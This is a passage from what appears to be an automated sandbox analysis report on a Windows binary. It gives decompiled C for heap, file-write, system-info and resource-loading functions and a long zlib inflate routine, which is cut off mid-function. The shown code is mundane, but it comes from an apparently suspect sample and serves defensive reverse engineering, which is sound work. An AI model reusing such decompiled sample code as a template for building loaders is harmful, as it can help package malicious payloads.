                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                        • String ID:
                                        • API String ID: 192546213-0
                                        • Opcode ID: 382063edaab7dbbc88a76c576b90e1987001e49d809a8943584728b73a15b192
                                        • Instruction ID: 58ff363585ee431b8201d99c981b7ea016601de88d95c52e32e50fe926cec15a
                                        • Opcode Fuzzy Hash: 382063edaab7dbbc88a76c576b90e1987001e49d809a8943584728b73a15b192
                                        • Instruction Fuzzy Hash: 03012975118301BAE500BB62DD06D3F7669EFD0718F108D3EB444B50E2DA3D88615A2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B060, Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040B060(void** _a4) {
				long _v4;
				void** _t18;

				_t18 = _a4;
				_v4 = 0;
				if(_t18[5] != 0) {
					return 0;
				} else {
					WriteFile( *_t18, _t18[1], _t18[2] - _t18[3],  &_v4, 0); // executed
					_t18[3] = _t18[2];
					return _v4;
				}
			}





                                        0x0040b062
                                        0x0040b066
                                        0x0040b072
                                        0x0040b0a0
                                        0x0040b074
                                        0x0040b087
                                        0x0040b090
                                        0x0040b099
                                        0x0040b099

                                        APIs
                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B028,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B087
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                                        • Instruction ID: dd2cf21c1fef62b742164fc1602911cfcefb36dd41cf0b541245b9c57e153138
                                        • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                                        • Instruction Fuzzy Hash: 66F0F276104600AFD320CF58D808B87FBE8EB48321F00C82EE69AC2650C730E810DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402B6D, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E00402B6D() {
				void* _t3;
				void* _t4;
				short* _t6;

				_t4 = 9;
				do {
					_t6 = _t6 - 4;
					 *_t6 = 0;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				E0040E600();
				_push(_t6); // executed
				L004050E2(); // executed
				if( *_t6 == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				return _t3;
			}






                                        0x00402b6e
                                        0x00402b73
                                        0x00402b73
                                        0x00402b76
                                        0x00402b7d
                                        0x00402b7d
                                        0x00402b80
                                        0x00402b88
                                        0x00402b89
                                        0x00402b96
                                        0x00402b9f
                                        0x00402b98
                                        0x00402b98
                                        0x00402b98
                                        0x00402ba5

                                        APIs
                                        • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: d75662d5afe5125d3f951223566fe9933b66bc9496a02c51f56ea1776fd0c1f1
                                        • Instruction ID: 12477d6361c4aecadb88e3b4323883f8923262c6174ab4fa80e52ab464f21b88
                                        • Opcode Fuzzy Hash: d75662d5afe5125d3f951223566fe9933b66bc9496a02c51f56ea1776fd0c1f1
                                        • Instruction Fuzzy Hash: 34D0C26040810846D710BE658509B9B73E8D700304F608C3AD084961C1F3BCE9D5C25B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A1C0, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040A1C0(long _a4) {
				long _t2;
				void* _t4;

				_t2 = _a4;
				if(_t2 <= 0) {
					return 0;
				} else {
					_t4 = RtlAllocateHeap( *0x418778, 8, _t2); // executed
					return _t4;
				}
			}





                                        0x0040a1c0
                                        0x0040a1c6
                                        0x0040a1dc
                                        0x0040a1c8
                                        0x0040a1d1
                                        0x0040a1d7
                                        0x0040a1d7

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A1D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                                        • Instruction ID: 609717bfa41b19916c47b5319cc863d4dd5feccda6c717b14f8b7bcde135c5c1
                                        • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                                        • Instruction Fuzzy Hash: C2C04C713442006AE650DB24DE09F5776A9BB70742F00C4367545D55B4DA30D860E72D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A160, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040A160() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x418778 = _t1;
				return _t1;
			}




                                        0x0040a169
                                        0x0040a16f
                                        0x0040a174

                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A169
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                                        • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                                        • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                                        • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A1A0, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040A1A0(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x418778, 0, _a4); // executed
				return _t2;
			}




                                        0x0040a1ac
                                        0x0040a1b2

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A1AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: 32acd3c8dead6836f4fa8724b06e6c8567e4304738f294a0bcbb310bf0f4ac3e
                                        • Instruction ID: a06a596741ae3bb17cae40800d0d20c49c8e4b2b3b58735e07998e68c68b4b86
                                        • Opcode Fuzzy Hash: 32acd3c8dead6836f4fa8724b06e6c8567e4304738f294a0bcbb310bf0f4ac3e
                                        • Instruction Fuzzy Hash: C5B01231004100BBDA014B10EE08F457A72E750700F10C035B200000F0C6310420EF0C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411D20, Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00411D20(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}




                                        0x00411d2a
                                        0x00411d33

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: a74d170a177d2abba39f75dc70704925c4774d5e02929e14f99022035755454c
                                        • Instruction ID: 9e296a90494422319026a4091b9091110507048c581a8a1181b924ca40c118d8
                                        • Opcode Fuzzy Hash: a74d170a177d2abba39f75dc70704925c4774d5e02929e14f99022035755454c
                                        • Instruction Fuzzy Hash: FAB09275408202AFC604CB54E98980ABBA8AA90210F80C824F04A86020C234E1188A0A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00402664, Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E00402664(void* __eflags, struct HINSTANCE__* _a4, struct HRSRC__* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _t16;
				void** _t17;

				_push(0);
				_push(0);
				E0040E600();
				_v8 = LoadResource(_a4, _a8);
				 *0x418078 = SizeofResource(_a4, _a8);
				_v8 = E0040A1C0( *0x418078);
				E0040A2A0(_v12, _v8,  *0x418078);
				FreeResource( *_t17);
				_t16 = _v20;
				return _t16;
			}








                                        0x00402666
                                        0x00402667
                                        0x00402668
                                        0x0040267a
                                        0x0040268a
                                        0x0040269a
                                        0x004026ac
                                        0x004026b4
                                        0x004026b9
                                        0x004026c4

                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685
                                          • Part of subcall function 0040A1C0: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A1D1
                                          • Part of subcall function 0040A2A0: memcpy.MSVCRT ref: 0040A2B0
                                        • FreeResource.KERNEL32(?,022F97F8,022F97F8,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                        • String ID:
                                        • API String ID: 4216414443-0
                                        • Opcode ID: 2111749565393c1e20589dfe68c209738951657948cfe46f2227ad070e8d37a0
                                        • Instruction ID: 8fefaebc088b5b3171f1eb07057e2dc99d0e6c0fe5b82c5007762d9858f8e426
                                        • Opcode Fuzzy Hash: 2111749565393c1e20589dfe68c209738951657948cfe46f2227ad070e8d37a0
                                        • Instruction Fuzzy Hash: 11F0D471018305AFDB01AF61DC0582EBEA1FB54304F508C3EB488511B1D7378868AB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EEA0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 666COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0040EEA0() {
				signed int _t719;
				signed int _t721;
				signed char* _t766;
				signed int* _t771;
				signed int _t784;
				void** _t794;
				signed int _t798;
				signed int _t805;
				void* _t812;

				_t771 =  *(_t812 + 4);
				if(_t771 == 0) {
					L369:
					return 0xfffffffe;
				} else {
					_t794 = _t771[7];
					 *(_t812 + 0x14) = _t794;
					if(_t794 == 0 || _t771[3] == 0 ||  *_t771 == 0 && _t771[1] != 0) {
						goto L369;
					} else {
						if( *_t794 == 0xb) {
							 *_t794 = 0xc;
						}
						_t784 = _t794[0xe];
						 *(_t812 + 0x18) = _t771[3];
						_t719 = _t771[4];
						 *(_t812 + 0x10) = _t719;
						 *(_t812 + 0x20) = _t719;
						_t805 = _t771[1];
						 *((intOrPtr*)(_t812 + 0x28)) = 0;
						_t721 =  *_t794;
						 *(_t812 + 0x10) =  *_t771;
						 *(_t812 + 0xc) = _t784;
						 *(_t812 + 0x38) = _t805;
						_t798 = _t794[0xf];
						if(_t721 > 0x1e) {
							L184:
							return 0xfffffffe;
						} else {
							 *(_t812 + 0x40) =  &(_t794[0x15]);
							_t766 =  *(_t812 + 0x14);
							do {
								switch( *((intOrPtr*)(_t721 * 4 +  &M004104E0))) {
									case 0:
										_t723 = _t794[2];
										if(_t723 != 0) {
											__eflags = _t798 - 0x10;
											if(_t798 >= 0x10) {
												L17:
												__eflags = _t723 & 0x00000002;
												if((_t723 & 0x00000002) == 0) {
													L20:
													_t724 = _t794[8];
													_t794[4] = 0;
													__eflags = _t724;
													if(_t724 != 0) {
														 *(_t724 + 0x30) = 0xffffffff;
													}
													__eflags = _t794[2] & 0x00000001;
													if((_t794[2] & 0x00000001) == 0) {
														L32:
														_t771[6] = "incorrect header check";
														 *_t794 = 0x1d;
													} else {
														_t727 = (_t784 >> 8) + ((_t784 & 0x000000ff) << 8);
														__eflags = _t727 % 0x1f;
														_t784 =  *(_t812 + 0x10);
														if(_t727 % 0x1f != 0) {
															_t771 =  *(_t812 + 0x48);
															goto L32;
														} else {
															__eflags = (_t784 & 0x0000000f) - 8;
															if((_t784 & 0x0000000f) == 8) {
																_t731 = _t794[9];
																_t798 = _t798 - 4;
																_t784 = _t784 >> 4;
																 *(_t812 + 0x10) = _t784;
																_t777 = (_t784 & 0x0000000f) + 8;
																__eflags = _t731;
																if(_t731 != 0) {
																	__eflags = _t777 - _t731;
																	if(_t777 <= _t731) {
																		goto L28;
																	} else {
																		_t771 =  *(_t812 + 0x48);
																		_t771[6] = "invalid window size";
																		 *_t794 = 0x1d;
																	}
																} else {
																	_t794[9] = _t777;
																	L28:
																	_push(0);
																	_push(0);
																	_push(0);
																	_t794[5] = 1 << _t777;
																	_t734 = E00411170();
																	_t789 =  *(_t812 + 0x1c);
																	_t812 = _t812 + 0xc;
																	_t771 =  *(_t812 + 0x48);
																	_t794[6] = _t734;
																	_t771[0xc] = _t734;
																	 *_t794 =  !(_t789 >> 8) & 0x00000002 | 0x00000009;
																	_t784 = 0;
																	 *(_t812 + 0x10) = 0;
																	_t798 = 0;
																}
															} else {
																_t771 =  *(_t812 + 0x48);
																_t771[6] = "unknown compression method";
																 *_t794 = 0x1d;
															}
														}
													}
												} else {
													__eflags = _t784 - 0x8b1f;
													if(_t784 != 0x8b1f) {
														goto L20;
													} else {
														_push(0);
														_push(0);
														_push(0);
														_t794[6] = E00410970();
														_push(2);
														_push(_t812 + 0x28);
														 *((short*)(_t812 + 0x30)) = 0x8b1f;
														_push(_t794[6]);
														_t737 = E00410970();
														_t784 = 0;
														_t794[6] = _t737;
														_t812 = _t812 + 0x18;
														 *(_t812 + 0x10) = 0;
														_t798 = 0;
														 *_t794 = 1;
														goto L182;
													}
												}
												goto L183;
											} else {
												while(1) {
													__eflags = _t805;
													if(_t805 == 0) {
														goto L103;
													}
													_t761 = ( *_t766 & 0x000000ff) << _t798;
													_t766 =  &(_t766[1]);
													_t784 = _t784 + _t761;
													 *(_t812 + 0x14) = _t766;
													_t798 = _t798 + 8;
													 *(_t812 + 0x10) = _t784;
													_t805 = _t805 - 1;
													__eflags = _t798 - 0x10;
													if(_t798 < 0x10) {
														continue;
													} else {
														_t723 = _t794[2];
														_t771 =  *(_t812 + 0x48);
														goto L17;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											 *_t794 = 0xc;
											goto L183;
										}
										goto L370;
									case 1:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L37:
											 *(__edi + 0x10) = __edx;
											__eflags = __dl - 8;
											if(__dl == 8) {
												__eflags = __edx & 0x0000e000;
												if((__edx & 0x0000e000) == 0) {
													__ecx =  *(__edi + 0x20);
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edx >> 8;
														__eax = __edx >> 0x00000008 & 0x00000001;
														__eflags = __eax;
														 *__ecx = __eax;
													}
													__eflags =  *(__edi + 0x10) & 0x00000200;
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push( *(__edi + 0x18));
														__eax = E00410970();
														__esp = __esp + 0xc;
														 *(__edi + 0x18) = __eax;
													}
													__edx = 0;
													 *__edi = 2;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L48;
												} else {
													 *(__ecx + 0x18) = "unknown header flags set";
													 *__edi = 0x1d;
													goto L183;
												}
											} else {
												 *(__ecx + 0x18) = "unknown compression method";
												 *__edi = 0x1d;
												goto L183;
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													__ecx =  *(__esp + 0x48);
													goto L37;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 2:
										__eflags = __esi - 0x20;
										if(__esi >= 0x20) {
											L50:
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 4) = __edx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												__eax = __edx;
												 *(__esp + 0x1c) = __dl;
												__eax = __edx >> 8;
												 *(__esp + 0x1d) = __al;
												__edx = __edx >> 0x10;
												 *(__esp + 0x1e) = __al;
												__eax = __esp + 0x1c;
												_push(4);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x27) = __dl;
												_push( *(__edi + 0x18));
												__eax = E00410970();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 3;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											goto L57;
										} else {
											while(1) {
												L48:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x20;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L50;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 3:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L59:
											__ecx =  *(__edi + 0x20);
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = __dl & 0x000000ff;
												 *(__ecx + 8) = __dl & 0x000000ff;
												__ecx = __edx;
												__eax =  *(__edi + 0x20);
												__ecx = __edx >> 8;
												__eflags = __ecx;
												 *(0xc +  *(__edi + 0x20)) = __ecx;
											}
											__eflags =  *(__edi + 0x10) & 0x00000200;
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __dl;
												__eax = __esp + 0x1c;
												_push(2);
												__eflags = __edx;
												_push(__eax);
												 *(__esp + 0x25) = __dl;
												_push( *(__edi + 0x18));
												__eax = E00410970();
												__esp = __esp + 0xc;
												 *(__edi + 0x18) = __eax;
											}
											__edx = 0;
											 *__edi = 4;
											 *(__esp + 0x10) = 0;
											__esi = 0;
											__eflags = 0;
											goto L64;
										} else {
											while(1) {
												L57:
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__edx = __edx + __eax;
												 *(__esp + 0x14) = __ebx;
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__eflags = __esi - 0x10;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L59;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 4:
										L64:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L75;
										} else {
											__eflags = __esi - 0x10;
											if(__esi >= 0x10) {
												L68:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __edx;
												__eflags = __eax;
												if(__eax != 0) {
													 *(__eax + 0x14) = __edx;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __dl;
													__eax = __esp + 0x1c;
													_push(2);
													__eflags = __edx;
													_push(__eax);
													 *(__esp + 0x25) = __dl;
													_push( *(__edi + 0x18));
													__eax = E00410970();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__ecx = 0;
												__esi = 0;
												 *(__esp + 0x10) = 0;
												L75:
												 *__edi = 5;
												goto L76;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x10;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L68;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 5:
										L76:
										__eflags =  *(__edi + 0x10) & 0x00000400;
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L90:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L91;
										} else {
											__ecx =  *(__edi + 0x40);
											 *(__esp + 0x34) = __ecx;
											__eflags = __ecx - __ebp;
											if(__ecx > __ebp) {
												__ecx = __ebp;
												 *(__esp + 0x34) = __ebp;
											}
											__eflags = __ecx;
											if(__ecx != 0) {
												__edx =  *(__edi + 0x20);
												__eflags = __edx;
												if(__edx != 0) {
													__eax =  *(__edx + 0x10);
													 *(__esp + 0x30) = __eax;
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *(__edx + 0x14);
														__eax =  *(__edx + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edx + 0x18);
														 *(__esp + 0x38) = __eax;
														__eflags = __eax - __edx;
														__eax =  *(__esp + 0x38);
														if(__eflags <= 0) {
															__edx = __ecx;
														} else {
															__edx = __edx - __eax;
														}
														__eax = __eax +  *(__esp + 0x30);
														__eflags = __eax;
														__eax = memcpy(__eax, __ebx, __edx);
														__ecx =  *(__esp + 0x40);
														__esp = __esp + 0xc;
													}
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E00410970();
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x34);
												__ebx = __ebx + __eax;
												__ebp = __ebp - __eax;
												 *(__esp + 0x14) = __ebx;
												_t152 = __edi + 0x40;
												 *_t152 =  *(__edi + 0x40) - __eax;
												__eflags =  *_t152;
											}
											__eflags =  *(__edi + 0x40);
											if( *(__edi + 0x40) != 0) {
												goto L103;
											} else {
												goto L90;
											}
										}
										goto L370;
									case 6:
										L91:
										__eflags =  *(__edi + 0x10) & 0x00000800;
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											__eflags = __eax;
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L116;
										} else {
											__eflags = __ebp;
											if(__ebp == 0) {
												goto L103;
											} else {
												__ecx = 0;
												__eflags = 0;
												while(1) {
													__eax =  *(__ebx + __ecx) & 0x000000ff;
													__ecx = 1 + __ecx;
													 *(__esp + 0x34) = __eax;
													__eax =  *(__edi + 0x20);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x1c);
														__eflags =  *(__eax + 0x1c);
														if( *(__eax + 0x1c) != 0) {
															__edx =  *(__edi + 0x40);
															__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
															if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																__eax =  *(__eax + 0x1c);
																__ebx =  *(__esp + 0x34);
																 *(__eax + __edx) = __bl;
																_t168 = __edi + 0x40;
																 *_t168 = 1 +  *(__edi + 0x40);
																__eflags =  *_t168;
																__ebx =  *(__esp + 0x14);
															}
														}
													}
													__eax =  *(__esp + 0x34);
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													__eflags = __ecx - __ebp;
													if(__ecx < __ebp) {
														continue;
													}
													break;
												}
												__eflags =  *(__edi + 0x10) & 0x00000200;
												 *(__esp + 0x38) = __ecx;
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													_push(__ecx);
													_push(__ebx);
													_push( *(__edi + 0x18));
													__eax = E00410970();
													__ecx =  *(__esp + 0x44);
													__esp = __esp + 0xc;
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x34);
												}
												__ebx = __ebx + __ecx;
												__ebp = __ebp - __ecx;
												 *(__esp + 0x14) = __ebx;
												__eflags = __eax;
												if(__eax == 0) {
													L116:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L117;
												} else {
													goto L103;
												}
											}
										}
